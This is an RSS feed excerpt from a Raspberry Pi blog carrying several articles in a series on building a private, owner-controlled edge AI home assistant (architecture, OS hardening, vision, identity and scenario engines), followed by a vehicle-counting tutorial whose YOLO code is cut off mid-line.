<guid isPermaLink="true">https://asky.uk/118/dialogue-engine-controlled-conversation-on-the-edge</guid>
<pubDate>Tue, 13 Jan 2026 08:23:04 +0000</pubDate>
</item>
<item>
<title>Scenario Engine: Event-Driven Behavior Without Autonomy</title>
<link>https://asky.uk/117/scenario-engine-event-driven-behavior-without-autonomy</link>
<description>&lt;p&gt;Scenario Engine: Event-Driven Behavior Without Autonomy&lt;br&gt;Designing Deterministic Actions on the Edge&lt;br&gt;&lt;br&gt;Introduction&lt;br&gt;The Scenario Engine is where perception and identity become action. Its role is not to “think” or decide freely, but to execute predefined responses to well-defined events. By design, it prevents autonomy while enabling rich, predictable behavior. This engine ensures the assistant remains useful without becoming unsafe or opaque.&lt;br&gt;&lt;br&gt;Why Event-Driven Design&lt;br&gt;Continuous decision loops are unnecessary and risky for a home assistant. An event-driven model reacts only to explicit triggers: identity resolution, speech intent, time schedules, or system states. This minimizes resource usage, reduces complexity, and guarantees traceability of actions.&lt;br&gt;&lt;br&gt;Core Concepts&lt;br&gt;The Scenario Engine is built around three primitives:&lt;br&gt;– Events: signals emitted by other engines&lt;br&gt;– Conditions: checks against context and state&lt;br&gt;– Actions: deterministic outputs&lt;br&gt;No scenario may create new rules at runtime. All logic is declared ahead of time.&lt;br&gt;&lt;br&gt;Event Sources&lt;br&gt;Typical events include:&lt;br&gt;– IdentityResolved(owner | guest | unknown)&lt;br&gt;– SpeechIntent(command, confidence)&lt;br&gt;– TimeEvent(schedule or interval)&lt;br&gt;– SystemEvent(startup, error, idle)&lt;br&gt;Events are immutable facts, not suggestions.&lt;br&gt;&lt;br&gt;Scenario Definition&lt;br&gt;A scenario is a static rule set bound to one or more events. It defines:&lt;br&gt;– priority&lt;br&gt;– required identity type&lt;br&gt;– optional conditions&lt;br&gt;– ordered actions&lt;br&gt;Scenarios never call each other recursively. This avoids emergent behavior.&lt;br&gt;&lt;br&gt;Priority and Conflict Resolution&lt;br&gt;Only one scenario may execute at a time. Priority rules are strict:&lt;br&gt;1) Owner-related scenarios override all others&lt;br&gt;2) Identity-based scenarios override time-based ones&lt;br&gt;3) Safety and system scenarios override informational ones&lt;br&gt;If no scenario matches, the system does nothing.&lt;br&gt;&lt;br&gt;Actions&lt;br&gt;Actions are simple, auditable operations:&lt;br&gt;– speak text via TTS&lt;br&gt;– play a sound&lt;br&gt;– send a notification&lt;br&gt;– query information&lt;br&gt;– trigger an automation endpoint&lt;br&gt;Actions cannot modify identity, permissions, or scenario definitions.&lt;br&gt;&lt;br&gt;State Management&lt;br&gt;The Scenario Engine maintains minimal state:&lt;br&gt;– current active scenario&lt;br&gt;– last executed scenario&lt;br&gt;– cooldown timers&lt;br&gt;State is transient and resettable. There is no long-term behavioral memory in this layer.&lt;br&gt;&lt;br&gt;Cooldowns and Rate Limiting&lt;br&gt;To prevent repetitive behavior, scenarios may define cooldown periods. For example, a greeting scenario should not trigger repeatedly while a person remains in view. Cooldowns are enforced strictly and do not adapt dynamically.&lt;br&gt;&lt;br&gt;Safety Constraints&lt;br&gt;The Scenario Engine enforces hard limits:&lt;br&gt;– no chained execution beyond a fixed depth&lt;br&gt;– no external actions without explicit allowance&lt;br&gt;– no self-modifying rules&lt;br&gt;– no learning from outcomes&lt;br&gt;This guarantees deterministic behavior.&lt;br&gt;&lt;br&gt;Testing and Simulation&lt;br&gt;Scenarios must be testable without live sensors. Events can be injected manually to validate priority, conditions, and actions. This enables safe iteration and regression testing before deployment.&lt;br&gt;&lt;br&gt;Failure Handling&lt;br&gt;If an action fails, the scenario terminates cleanly. Errors are logged, not retried automatically unless explicitly defined. Failure never escalates privileges or triggers fallback intelligence.&lt;br&gt;&lt;br&gt;Integration with Dialogue and Automation&lt;br&gt;The Scenario Engine passes bounded context to Dialogue and Automation Engines. Those engines execute tasks but cannot alter scenario flow. Control always returns to the Scenario Engine after execution.&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://tse1.mm.bing.net/th/id/OIP.Z1X3pRjEdCFWufZNwSuMZQHaDh?w=474&amp;amp;h=379&amp;amp;c=7&amp;amp;p=0" style="height:460px; width:575px"&gt;&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;With deterministic behavior established, the next article focuses on the Dialogue Engine: speech, intent extraction, and controlled conversational interaction without turning the assistant into an open-ended agent.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/117/scenario-engine-event-driven-behavior-without-autonomy</guid>
<pubDate>Tue, 13 Jan 2026 08:18:54 +0000</pubDate>
</item>
<item>
<title>Identity Engine: Owner, Guests, and Scenarios Establishing Trust, Control, and Meaningful Interactio</title>
<link>https://asky.uk/116/identity-scenarios-establishing-control-meaningful-interactio</link>
<description>&lt;p&gt;Introduction&lt;br&gt;The Identity Engine is the system’s trust boundary. Vision can suggest who is present, but identity defines what that presence means. Without a strict identity model, personalization becomes unsafe and unpredictable. This engine translates recognition into controlled, meaningful interaction while preserving ownership and security.&lt;br&gt;&lt;br&gt;Core Identity Model&lt;br&gt;The system operates with a strict hierarchy:&lt;br&gt;– Owner (root identity)&lt;br&gt;– Recognized guests&lt;br&gt;– Unknown presence&lt;br&gt;There are no peer users and no shared administration. This mirrors a root-based security model rather than a social platform.&lt;br&gt;&lt;br&gt;Owner Identity&lt;br&gt;There is exactly one Owner. The Owner configures the system, enrolls identities, defines scenarios, manages API access, and owns all data. The Owner can audit logs, adjust thresholds, and disable modules. No other identity can modify system behavior. Ownership is explicit and non-transferable without reinitialization.&lt;br&gt;&lt;br&gt;Recognized Guests&lt;br&gt;Guests are identified individuals with no permissions. They cannot access data, configure behavior, or trigger administrative actions. Their identity exists only to enable predefined scenarios. Recognition does not imply trust beyond what the Owner has explicitly defined.&lt;br&gt;&lt;br&gt;Unknown Presence&lt;br&gt;Unknown individuals are treated neutrally. The system does not attempt identification, does not store embeddings, and does not trigger personalized scenarios. Unknown presence may optionally trigger generic actions such as a neutral greeting or no response at all.&lt;br&gt;&lt;br&gt;Identity Resolution Flow&lt;br&gt;Identity resolution occurs only after the Vision Engine produces a candidate with sufficient confidence. The Identity Engine verifies:&lt;br&gt;– confidence threshold&lt;br&gt;– enrollment validity&lt;br&gt;– identity status (owner, guest, unknown)&lt;br&gt;Only then does it pass context to higher layers. Failed resolution results in an unknown identity state.&lt;br&gt;&lt;br&gt;Scenario Concept&lt;br&gt;A scenario is a deterministic response template bound to an identity or event. Scenarios define how the assistant behaves, not what it decides. This separation prevents emergent or unintended behavior.&lt;br&gt;&lt;br&gt;Scenario Structure&lt;br&gt;Each scenario may include:&lt;br&gt;– greeting text&lt;br&gt;– voice profile&lt;br&gt;– allowed information scope&lt;br&gt;– optional notifications&lt;br&gt;– automation triggers&lt;br&gt;Scenarios are static definitions evaluated at runtime. They do not modify themselves.&lt;br&gt;&lt;br&gt;Examples&lt;br&gt;Owner scenario:&lt;br&gt;“Welcome back. You have two new emails and a scheduled meeting in one hour.”&lt;br&gt;Guest scenario:&lt;br&gt;“Hello John. Nice to see you.”&lt;br&gt;Unknown scenario:&lt;br&gt;No response or neutral acknowledgment.&lt;br&gt;&lt;br&gt;Scenario Selection Rules&lt;br&gt;Only one scenario may be active at a time. Identity-based scenarios override time-based or ambient scenarios. Owner presence always supersedes guest presence. Ambiguous identity states fall back to unknown.&lt;br&gt;&lt;br&gt;Security Guarantees&lt;br&gt;The Identity Engine enforces:&lt;br&gt;– no privilege escalation&lt;br&gt;– no dynamic permission grants&lt;br&gt;– no identity chaining&lt;br&gt;– no learning from behavior&lt;br&gt;This guarantees that the system cannot evolve into a multi-user or shared-control assistant unintentionally.&lt;br&gt;&lt;br&gt;Auditability&lt;br&gt;All identity decisions are logged as metadata events without storing biometric data. Logs include timestamps, resolved identity category, and scenario selected. This enables review without exposing sensitive content.&lt;br&gt;&lt;br&gt;Failure and Misidentification Handling&lt;br&gt;Misidentification is treated as a system fault, not user error. Conservative thresholds minimize false positives. When confidence is insufficient, the system defaults to unknown. It is always safer to miss recognition than to misidentify.&lt;br&gt;&lt;br&gt;Integration with Other Engines&lt;br&gt;The Identity Engine outputs a clean context object: identity type, name (if applicable), and scenario reference. Dialogue and Automation Engines operate strictly within this context and cannot bypass identity constraints.&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;With identity and trust boundaries defined, the next article focuses on the Scenario Engine in depth: designing scalable scenario logic, prioritization rules, and event-driven behavior without turning the assistant into an autonomous agent.&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://media.geeksforgeeks.org/wp-content/uploads/20221215162638/IAM-Architecture-2.png" style="height:270px; width:540px"&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/116/identity-scenarios-establishing-control-meaningful-interactio</guid>
<pubDate>Fri, 09 Jan 2026 18:33:32 +0000</pubDate>
</item>
<item>
<title>Vision Engine: Face Detection and Recognition on the Edge</title>
<link>https://asky.uk/115/vision-engine-face-detection-and-recognition-on-the-edge</link>
<description>&lt;p&gt;Introduction&lt;br&gt;The Vision Engine is the assistant’s perceptual foundation. Its purpose is not surveillance, tracking, or behavioral analysis. It answers a single, constrained question: is a known person present, and if so, who? Everything in its design follows from this limitation. Correctly implemented, the Vision Engine enables personalization without compromising privacy or system trust.&lt;br&gt;&lt;br&gt;Detection vs Recognition&lt;br&gt;Face detection and face recognition are often confused but serve different roles. Detection answers “is there a face in the frame?” Recognition answers “whose face is this?” Detection is lightweight and continuous; recognition is heavier and event-driven. Separating the two is critical for performance and privacy. Detection runs frequently, recognition only when necessary.&lt;br&gt;&lt;br&gt;Design Principles&lt;br&gt;The Vision Engine follows four non-negotiable principles:&lt;br&gt;– local processing only&lt;br&gt;– no continuous recording&lt;br&gt;– no raw image storage&lt;br&gt;– explicit owner-controlled enrollment&lt;br&gt;Frames are processed in memory and discarded immediately. Only numerical embeddings are stored.&lt;br&gt;&lt;br&gt;Camera Strategy&lt;br&gt;Use a single fixed camera covering an entry zone. Wide-angle lenses reduce blind spots but increase distortion; moderate field-of-view lenses simplify embeddings. Native CSI cameras are preferred for lower latency and CPU overhead. USB cameras are acceptable but less deterministic under load.&lt;br&gt;&lt;br&gt;Face Detection Pipeline&lt;br&gt;Face detection should be fast, robust, and tolerant to lighting changes. The detector’s only responsibility is to locate faces and provide bounding boxes. False positives are acceptable; missed detections should be rare. Detection runs continuously at a reduced frame rate to conserve resources.&lt;br&gt;&lt;br&gt;Recognition Pipeline&lt;br&gt;Recognition is triggered only when:&lt;br&gt;– a face remains in view for a minimum time&lt;br&gt;– the bounding box is stable&lt;br&gt;– detection confidence exceeds a threshold&lt;br&gt;The cropped face is converted into an embedding vector using a lightweight neural model. This vector represents facial features numerically and contains no reconstructable image data.&lt;br&gt;&lt;br&gt;Embedding Database&lt;br&gt;Each known person is represented by multiple embeddings generated from different reference photos. These are stored locally in a simple database (file-based, SQLite, or vector index). Matching uses cosine similarity or Euclidean distance. Thresholds must be conservative to avoid misidentification.&lt;br&gt;&lt;br&gt;Enrollment Process&lt;br&gt;Only the owner can enroll new identities. Enrollment consists of uploading several reference images under controlled lighting and angles. Embeddings are generated once and stored. No further learning occurs automatically. This prevents silent drift and identity corruption.&lt;br&gt;&lt;br&gt;Decision Logic&lt;br&gt;Recognition results are never binary. Each match includes a confidence score. The system reacts only above a strict acceptance threshold. Below threshold, the face is treated as unknown. Unknown faces trigger no scenarios and no logging beyond transient system metrics.&lt;br&gt;&lt;br&gt;Privacy Safeguards&lt;br&gt;The Vision Engine does not:&lt;br&gt;– stream video externally&lt;br&gt;– archive frames&lt;br&gt;– perform emotion or behavior analysis&lt;br&gt;– identify unknown individuals&lt;br&gt;Physical camera indicators are recommended. The system must be auditable and predictable.&lt;br&gt;&lt;br&gt;Performance Considerations&lt;br&gt;Raspberry Pi 5 can sustain real-time detection and event-based recognition concurrently if frame rates are controlled. Detection should be decoupled from recognition threads. CPU affinity and memory locality improve latency consistency. Thermal stability directly affects recognition reliability.&lt;br&gt;&lt;br&gt;Failure Modes&lt;br&gt;Common failure modes include poor lighting, occlusions, and extreme angles. These are acceptable limitations. The system must fail safely by treating uncertain inputs as unknown rather than guessing.&lt;br&gt;&lt;br&gt;Integration with Identity Engine&lt;br&gt;The Vision Engine outputs only one thing: a candidate identity with confidence. All decisions beyond that point belong to the Identity and Scenario Engines. This strict separation prevents accidental coupling between perception and behavior.&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;With visual perception in place, the next article introduces the Identity Engine in detail: ownership, trust boundaries, scenario mapping, and how recognized faces become meaningful interactions rather than raw labels.&lt;br&gt;&lt;img alt="" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSCfxmzdA1n88uRpZPs5qtvz1A9e6Ffnw00ZA&amp;amp;s" style="height:401px; width:645px"&gt;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/115/vision-engine-face-detection-and-recognition-on-the-edge</guid>
<pubDate>Fri, 09 Jan 2026 18:27:43 +0000</pubDate>
</item>
<item>
<title>Preparing Raspberry Pi 5 for Edge AI Operating System, Performance, Storage, Cooling, and Security</title>
<link>https://asky.uk/114/preparing-raspberry-operating-performance-storage-security</link>
<description>Introduction&lt;br /&gt;
Before writing a single line of AI code, the Raspberry Pi must be treated as what it really is in this project: a small edge server. Stability, predictable performance, thermal control, and security matter more than convenience. This article prepares Raspberry Pi 5 (16 GB RAM) as a reliable Edge AI platform suitable for continuous operation in a home environment.&lt;br /&gt;
&lt;br /&gt;
Operating System Selection&lt;br /&gt;
For Edge AI, the operating system must be lightweight, stable, and well supported. Raspberry Pi OS Lite (64-bit) is the recommended baseline. It avoids unnecessary desktop overhead while maintaining full hardware support and long-term updates. Ubuntu Server is viable but introduces additional latency, memory overhead, and less predictable GPIO and camera behavior. Desktop environments are explicitly discouraged for always-on AI workloads.&lt;br /&gt;
&lt;br /&gt;
Initial System Setup&lt;br /&gt;
Flash Raspberry Pi OS Lite (64-bit). On first boot:&lt;br /&gt;
– expand filesystem&lt;br /&gt;
– set locale and timezone&lt;br /&gt;
– disable unused services&lt;br /&gt;
– enable SSH (key-based authentication only)&lt;br /&gt;
– update firmware and packages&lt;br /&gt;
The system should boot cleanly with minimal background processes.&lt;br /&gt;
&lt;br /&gt;
Storage Strategy&lt;br /&gt;
AI workloads stress storage through logging, temporary buffers, and model loading. A high-quality NVMe SSD via PCIe is strongly recommended over SD cards. Benefits include higher I/O throughput, lower latency, and dramatically improved reliability. The OS, logs, embeddings, and models should all reside on NVMe. SD cards should be avoided except for recovery.&lt;br /&gt;
&lt;br /&gt;
Memory Management&lt;br /&gt;
16 GB RAM allows generous buffering but must still be managed. Enable zram to reduce swap pressure and avoid SD or SSD thrashing. Traditional disk swap should be minimal or disabled entirely. AI inference benefits from memory locality; avoid aggressive overcommit. Monitor memory usage early to establish baseline behavior.&lt;br /&gt;
&lt;br /&gt;
CPU Performance Tuning&lt;br /&gt;
By default, Raspberry Pi dynamically scales CPU frequency. For AI workloads, consistency matters more than peak bursts. Set the CPU governor to “performance” for deterministic latency. Disable unnecessary throttling features while respecting thermal limits. This improves frame-to-frame timing for vision and audio pipelines.&lt;br /&gt;
&lt;br /&gt;
Thermal Design&lt;br /&gt;
Thermal stability is critical. Raspberry Pi 5 can throttle aggressively under sustained load. Passive cooling is insufficient for continuous AI workloads. Use an active cooling solution: a heatsink with fan or an active case. Monitor temperature under load; sustained operation should remain well below throttling thresholds. Stable thermals equal stable inference timing.&lt;br /&gt;
&lt;br /&gt;
Camera and Peripheral Configuration&lt;br /&gt;
Enable the CSI camera interface early. Use native camera modules when possible to reduce USB overhead and latency. USB cameras are acceptable but consume additional bandwidth and CPU cycles. Disable unused interfaces (Bluetooth, Wi-Fi, HDMI) if not required to reduce power draw and noise.&lt;br /&gt;
&lt;br /&gt;
Audio Subsystem Preparation&lt;br /&gt;
Audio input must be reliable and low-latency. USB microphones are preferred over analog solutions. Disable unused ALSA devices and confirm stable sampling rates. Test continuous audio capture early to detect buffer underruns or driver instability.&lt;br /&gt;
&lt;br /&gt;
Security Hardening&lt;br /&gt;
This system processes sensitive data by design. Apply basic hardening:&lt;br /&gt;
– SSH keys only, no passwords&lt;br /&gt;
– firewall enabled with minimal open ports&lt;br /&gt;
– services bound to localhost by default&lt;br /&gt;
– no cloud sync or telemetry&lt;br /&gt;
– physical access considered trusted only for the owner&lt;br /&gt;
Security is not optional; it is part of system correctness.&lt;br /&gt;
&lt;br /&gt;
Service Layout Philosophy&lt;br /&gt;
Treat the system as modular services, not scripts. Each major function (vision, identity, dialogue, automation) should eventually run as an isolated service or container. Even at early stages, adopt clean directory structures and logging conventions. This prevents architectural decay as complexity grows.&lt;br /&gt;
&lt;br /&gt;
Baseline Validation&lt;br /&gt;
Before proceeding, validate:&lt;br /&gt;
– stable boot and shutdown&lt;br /&gt;
– no thermal throttling under load&lt;br /&gt;
– camera and microphone operate reliably&lt;br /&gt;
– storage I/O is consistent&lt;br /&gt;
– system remains responsive over hours of operation&lt;br /&gt;
Only after this baseline is confirmed should AI components be introduced.&lt;br /&gt;
&lt;br /&gt;
What Comes Next&lt;br /&gt;
With the platform prepared, the next article introduces the Vision Engine: face detection and recognition using locally generated embeddings. We move from infrastructure to perception, while preserving privacy and determinism.</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/114/preparing-raspberry-operating-performance-storage-security</guid>
<pubDate>Thu, 08 Jan 2026 21:16:59 +0000</pubDate>
</item>
<item>
<title>Architecture, Identity, and Control</title>
<link>https://asky.uk/113/architecture-identity-and-control</link>
<description>&lt;p&gt;&lt;img alt="" src="https://piaustralia.com.au/cdn/shop/articles/rpi-home-automation.png?v=1716599832&amp;amp;width=1600" style="height:560px; width:560px"&gt;&lt;br&gt;Introduction&lt;br&gt;Most consumer “smart assistants” are not assistants but cloud terminals. Audio, video, and context are captured locally, while intelligence and decision-making happen elsewhere. This architecture is convenient, but incompatible with privacy, ownership, and deep personalization. This article series explores a different approach: a private, owner-controlled AI assistant running locally on Raspberry Pi 5 (16 GB RAM). The system recognizes specific people, reacts with personalized behavior, communicates naturally, retrieves information, and integrates smart functionality, while keeping perception and identity on the edge.&lt;br&gt;&lt;br&gt;Edge AI vs Cloud Assistants&lt;br&gt;Cloud-first assistants offer massive compute and rapid iteration, but suffer from permanent data exfiltration, limited identity isolation, vendor lock-in, and unverifiable behavior. An edge-first assistant trades unlimited scale for determinism, privacy, offline capability, and full control. This project adopts a hybrid edge philosophy: perception, identity, memory, and automation are local; external APIs are used selectively for language and information retrieval.&lt;br&gt;&lt;br&gt;System Boundaries&lt;br&gt;Clear boundaries prevent scope creep.&lt;br&gt;The assistant IS:&lt;br&gt;– single-owner&lt;br&gt;– identity-aware&lt;br&gt;– event-driven&lt;br&gt;– locally perceptive (vision + audio)&lt;br&gt;– modular and inspectable&lt;br&gt;The assistant IS NOT:&lt;br&gt;– a surveillance system&lt;br&gt;– a multi-user platform&lt;br&gt;– a cloud mirror&lt;br&gt;– an autonomous agent with open permissions&lt;br&gt;– a replacement for personal devices&lt;br&gt;&lt;br&gt;High-Level Architecture&lt;br&gt;The system is composed of five cooperating engines:&lt;br&gt;Vision Engine → detects presence&lt;br&gt;Identity Engine → resolves who is present&lt;br&gt;Scenario Engine → selects behavior&lt;br&gt;Dialogue Engine → communicates&lt;br&gt;Automation/Services → executes actions&lt;br&gt;Each module is loosely coupled and replaceable.&lt;br&gt;&lt;br&gt;Vision Engine&lt;br&gt;The Vision Engine answers a narrow question: is a known person present? It does not perform continuous recording or remote streaming. The owner uploads reference photos; face embeddings are generated and stored locally. Matching is event-based. Raw images are not retained. This is recognition, not surveillance.&lt;br&gt;&lt;br&gt;Identity Engine&lt;br&gt;Identity is central. There is exactly one Owner identity. The owner configures the system, approves known individuals, defines scenarios, controls API access, and owns all data. Other people are recognized but have no permissions. They are mapped only to scenarios and responses. This mirrors a root/user separation model.&lt;br&gt;&lt;br&gt;Scenario Engine&lt;br&gt;A scenario defines how the assistant reacts to a specific identity or event. It includes greeting style, voice tone, optional notifications, and automation triggers. Examples: “Welcome home, John. You received an email an hour ago.” or “Hello Uncle Alan. Good to see you.” Scenarios are explicit, inspectable, and reversible.&lt;br&gt;&lt;br&gt;Dialogue Engine&lt;br&gt;Conversation is handled by a controlled dialogue engine. Speech is converted to text, enriched with identity context, filtered through scope rules, and routed either locally or via selected APIs. The assistant does not decide what it is allowed to do; it only responds within predefined limits. This prevents accidental autonomy.&lt;br&gt;&lt;br&gt;Why Raspberry Pi 5 (16 GB)&lt;br&gt;Raspberry Pi 5 finally makes serious home Edge AI practical. It can run face recognition pipelines, vector databases, audio processing, and multiple concurrent services reliably. The 16 GB RAM variant provides headroom for embeddings, buffers, and future expansion. This is not excess—it is engineering margin.&lt;br&gt;&lt;br&gt;Privacy and Ethics by Design&lt;br&gt;Privacy is enforced architecturally, not by policy. Cameras and microphones process locally. No silent uploads. No background analytics. Physical indicators are recommended. Trust emerges from predictable, inspectable behavior.&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;This article defined the architectural foundation and constraints. The next article covers preparing Raspberry Pi 5 for Edge AI: OS selection, performance tuning, storage, cooling, and security hardening. Step by step, the series will lead to a fully functional personal AI assistant that remains under the owner’s control.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/113/architecture-identity-and-control</guid>
<pubDate>Thu, 08 Jan 2026 21:09:38 +0000</pubDate>
</item>
<item>
<title>Multi-Zone Traffic Analytics (Multiple Lines + Directions) on Raspberry Pi</title>
<link>https://asky.uk/111/multi-traffic-analytics-multiple-lines-directions-raspberry</link>
<description>Hardware: Raspberry Pi 4 / Raspberry Pi 5&lt;br /&gt;
AI type: Computer Vision – Multi-Zone Counting&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Overview&lt;br /&gt;
&lt;br /&gt;
This project extends basic traffic analytics by using multiple virtual lines&lt;br /&gt;
(zones) and counting vehicles by direction. It enables simple intersection&lt;br /&gt;
analysis using AI on Raspberry Pi, fully offline and without GPUs.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
What you build&lt;br /&gt;
&lt;br /&gt;
- AI vehicle detection on Raspberry Pi&lt;br /&gt;
- Multiple virtual counting lines (zones)&lt;br /&gt;
- Direction-based counting per zone&lt;br /&gt;
- Fully local processing&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Required hardware&lt;br /&gt;
&lt;br /&gt;
- Raspberry Pi 4 or Raspberry Pi 5&lt;br /&gt;
- Camera (USB or Raspberry Pi Camera)&lt;br /&gt;
- microSD card&lt;br /&gt;
- Power supply&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Software requirements&lt;br /&gt;
&lt;br /&gt;
- Raspberry Pi OS&lt;br /&gt;
- Python 3&lt;br /&gt;
- OpenCV&lt;br /&gt;
- Ultralytics YOLO (lightweight model)&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
System architecture&lt;br /&gt;
&lt;br /&gt;
1. Camera captures frames&lt;br /&gt;
2. AI model detects vehicles&lt;br /&gt;
3. Vehicle centers are tracked between frames&lt;br /&gt;
4. Each virtual line (zone) checks crossing direction&lt;br /&gt;
5. Counters are updated per zone and direction&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Installation&lt;br /&gt;
&lt;br /&gt;
sudo apt update&lt;br /&gt;
sudo apt upgrade&lt;br /&gt;
sudo apt install python3-opencv python3-pip&lt;br /&gt;
pip3 install ultralytics&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Zone concept&lt;br /&gt;
&lt;br /&gt;
Each zone is defined by a horizontal line position.&lt;br /&gt;
When a vehicle center crosses a line, the direction&lt;br /&gt;
(up or down) determines which counter is updated.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Python code (copy-paste)&lt;br /&gt;
&lt;br /&gt;
import cv2&lt;br /&gt;
from ultralytics import YOLO&lt;br /&gt;
&lt;br /&gt;
model = YOLO(&amp;quot;yolov8n.pt&amp;quot;)&lt;br /&gt;
cap = cv2.VideoCapture(0)&lt;br /&gt;
&lt;br /&gt;
zones = [200, 300] &amp;nbsp;&amp;nbsp;# Y positions of virtual lines&lt;br /&gt;
prev_y = None&lt;br /&gt;
&lt;br /&gt;
counts = {&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;200: {&amp;quot;up&amp;quot;: 0, &amp;quot;down&amp;quot;: 0},&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;300: {&amp;quot;up&amp;quot;: 0, &amp;quot;down&amp;quot;: 0}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
while True:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;ret, frame = cap.read()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if not ret:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;break&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;results = model(frame, verbose=False)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;boxes = results[0].boxes&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if len(boxes) &amp;gt; 0:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;x1, y1, x2, y2 = boxes[0].xyxy[0]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cy = int((y1 + y2) / 2)&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if prev_y is not None:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;for z in zones:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if prev_y &amp;lt; z and cy &amp;gt;= z:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;counts[z][&amp;quot;down&amp;quot;] += 1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;elif prev_y &amp;gt; z and cy &amp;lt;= z:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;counts[z][&amp;quot;up&amp;quot;] += 1&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;prev_y = cy&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;for z in zones:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cv2.line(frame, (0, z), (frame.shape[1], z), (255, 0, 0), 2)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cv2.putText(frame,&lt;br /&gt;
